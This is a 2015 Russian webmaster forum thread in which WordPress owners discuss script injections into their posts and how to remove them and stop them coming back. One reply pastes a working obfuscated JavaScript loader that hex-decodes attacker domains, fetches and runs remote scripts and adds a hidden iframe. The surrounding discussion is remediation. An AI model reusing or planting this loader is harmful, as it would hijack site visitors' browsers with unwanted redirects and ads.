Срочно! Вирус на worpdress судя по поиску гугл, он есть уже на многих сайтах

Сообщений: 7178 Регистрация: Дек 2011

24 Августа 2015 12:32

В общем, как обычно копал старые записи и увидел внутри ссылки между <a></a> встроен скрипт <script type="text/javascript" src="//shareup.ru/social.js"></script>, еще в одной записи другого вида <script type="text/javascript" src="//css.googleaps.ru/css?f=Open+Sans&cd=mb&ver=4.2.2"></script>, полез копаться во всех записях - в итоге почти во всех картинках и во всех внутренних ссылках стоит эта гадость. Мыслей пока никаких, нашел вот тут _https://toster.ru/q/230165 люди описывают люди проблему, но решений чего то пока нет, пишут про обновление до 4.2.4, у меня уже 4.3 давненько, и дыру судя по всему не закрывает это обновление. Посмотрите свои сайты и давайте думать как лечить. У мну порядка 2000 записей, чего то не охота все руками чистить.

50 т.р. в месяц на киносайте РЕГИСТРАЦИЯ - обучаю рефералов, в ЛС

Лучшая партнерка - 25 т.р. в месяц РЕГИСТРАЦИЯ

Качественные дешевые статьи КУПИТЬ

span4bob

Сообщений: 6461 Регистрация: Апр 2013

24 Августа 2015 12:36

Цитата
Влад Мищенко пишет: У мну порядка 2000 записей, чего то не охота все руками чистить.

regex search плагин в помощь

Дай новую жизнь своим БЭКЛИНКАМ!!!
▼
► ◄
▲

Продвижение сателлитами ☻

Влад Мищенко

Сообщений: 7178 Регистрация: Дек 2011

24 Августа 2015 12:37

Цитата
span4bob пишет: regex search плагин в помощь

он ищет или удалять тоже может пачками? найти не проблема - 90% записей с этой хренью

span4bob

Сообщений: 6461 Регистрация: Апр 2013

24 Августа 2015 12:41

Цитата
Влад Мищенко пишет: он ищет или удалять тоже может пачками?

естествено
в одной форме вставляете то что ищите (в данном случае ваш скрипт), а во второй оставляете пустое поле. Нажимаете "Find and replace"
и все

Влад Мищенко

Сообщений: 7178 Регистрация: Дек 2011

24 Августа 2015 12:42

Цитата
span4bob пишет: естествено в одной форме вставляете то что ищите (в данном случае ваш скрипт), а во второй оставляете пустое поле. Нажимаете "Find and replace" и все

это найс, а как вылечить эту каку, чтобы она снова не появилась?

span4bob

Сообщений: 6461 Регистрация: Апр 2013

24 Августа 2015 13:01

Цитата
Влад Мищенко пишет: а как вылечить эту каку, чтобы она снова не появилась?

если честно без понятия.
а с чего в sdpzkb что эти скрипты вредят сайту?

SharkCinema

Сообщений: 619 Регистрация: Окт 2014

24 Августа 2015 13:09

Вот вам http://www.securitylab.ru/news/474413.php

http://smswifi.ru - SAS WiFi СМС авторизация для вашего бизнеса. | http://supportila.ru - личный блог.

Влад Мищенко

Сообщений: 7178 Регистрация: Дек 2011

24 Августа 2015 13:19

Цитата
SharkCinema пишет: http://www.securitylab.ru/news/474413.php

это малость не то, тут никуда не перенаправляет. и не тот вирус

Александр I

Сообщений: 605 Регистрация: Янв 2014

24 Августа 2015 13:32

Цитата
Влад Мищенко пишет: никуда не перенаправляет

а этот куда перенаправляет? Просто я хотел посмотреть исходный код JS, а он нифига не открывается (не один из трех) - 403 :confused:По идее, чтобы выполняться, скрипт должен сначала быть загружен smile:confused:

Отзыв на хостинг it-mcp.ru

Lara

Сообщений: 34 Регистрация: Май 2011

#10

26 Августа 2015 11:46

Влад, скажите, удалось вам избавиться от этих скриптов? Подскажите, что именно вы сделали?

D-E-Z

Сообщений: 1202 Регистрация: Дек 2012

#11

26 Августа 2015 12:21

Код

<script type="text/javascript">// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="17339",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("8044.com.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
// ]]></script><iframe id="a1996667054" style="display: none;" src="https://ui5nvtxlm.ru/f.html"></iframe>

у меня вот недавно такое было в последних записях. Тоже инфы тоже мало, такой код был вставлен в поля описания товара. Говорят было заражение через браузер, так как не все страницы, а только последние которые редактировали. Удалял вручную. Редиректило на алли экспресс, высплывал банер вк

D-E-Z

Сообщений: 1202 Регистрация: Дек 2012

#12

26 Августа 2015 12:24

могу предположить, что нет решение так как идет заражение именно через браузер, как в моей ситуации, такая беда как у меня была на разных движках и даже на самописах

Nata Nata

Сообщений: 152 Регистрация: Окт 2011

#13

26 Августа 2015 13:06

Если говорить о внедрении скриптов uptoliked.ru, css.googleaps.ru, wq4.ru, shareup.ru/social.js, то проблема эта появилась примерно в середине июня на многих сайтах WP.
Наиболее вероятно, - SQL инъекция путем взлома админки (точно - не через зараженный браузер).

Простое удаление внедренных скриптов из кода приводит к тому, что ровно через неделю (проверено) они появляются снова. Причем, на тех же самых местах.

Что, вероятно, поможет: удаление внедренных скриптов, проверка сайта сканером AI-Bolit http://revisium.com/ai/ и удаление подозрительных файлов (они могут быть не только .php, но и с другими расширениями, например, .gif).

Coder

Сообщений: 10554 Регистрация: Мар 2013

#14

26 Августа 2015 13:15

Цитата
Nata Nata пишет: Что, вероятно, поможет

Тема обсуждалась, и способы защиты, для любых сайтов - то же. Почему бы не поискать поиском по форуму - много полезного что есть.

_http://www.cy-pr.com/forum/f21/t79509/m864212#message864212

✓ Проверенные скрипты и полезности для сайта

✓ Курсы

✓ Сервис временных ссылок

Nata Nata Сообщений: 152 Регистрация: Окт 2011	#15 26 Августа 2015 13:36 Coder, ТС вообще-то не я...

Похожие темы:

11.12.2024 14:57	Конгресс США заявил о лабораторном происхождении коронавируса
30.06.2024 21:52	Корейский провайдер наказал пользователей торрентов вирусами, а теперь наказание грозит ему
06.03.2024 12:01	Спойлер на 2024: "Зомби-вирус"
07.05.2023 08:48	ВОЗ официально объявила о завершении пандемии коронавируса
24.10.2022 21:18	Немецкие ученые нашли доказательства лабораторного происхождения коронавируса

Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)

Новые темы	Объявления	Свободное общение
00:23 body rub nyc https//knocktouch.com/ bedpage body rub nyc https//knocktouch.com/ adult massage nyc body rub nyc https//knocktouch.com/ bedpage body rub nyc https//knocktouch.com/ adult massage nyc body rub nyc https//knocktouch.com/ bedpage body rub nyc ht 00:14 Нужна помощь советом! 19:55 SEO под нейро 16:56 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 14:47 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 14:23 SharkBoss - партнёрская программа для монетизации ЛЮБЫХ видов трафика (включая спам). 09:44 SEO 2025 - контент, уже не главное. Главное - Конечная цель...	22:20 BestX24 - быстрый и безопасный обменник криптовалют и электронных денежных средств 19:20 Продам аккаунты HH.RU 19:20 Продажа аккаунтов HH.RU 17:43 Volna.money 17:33 SpaceSwap.cc - Быстрый и надежный обменник криптовалют 16:28 WebKazna. Обмены криптовалют. Доставка наличных. 12:42 - Вечные ссылки с трастовых сайтов 2024 проверен FastTrust	17:18 Точные прогнозы на футбол 17:41 Стряхнуть обыденность - об Агасфере 10:54 Добро пожаловать в цифровой мир... 22:39 Топ-5 способов использовать мобильные прокси для бизнеса: подробный обзор 11:58 Куплю проигрышные букмекерские аккаунты 00:12 Огородники 10:59 Новости искусственного интеллекта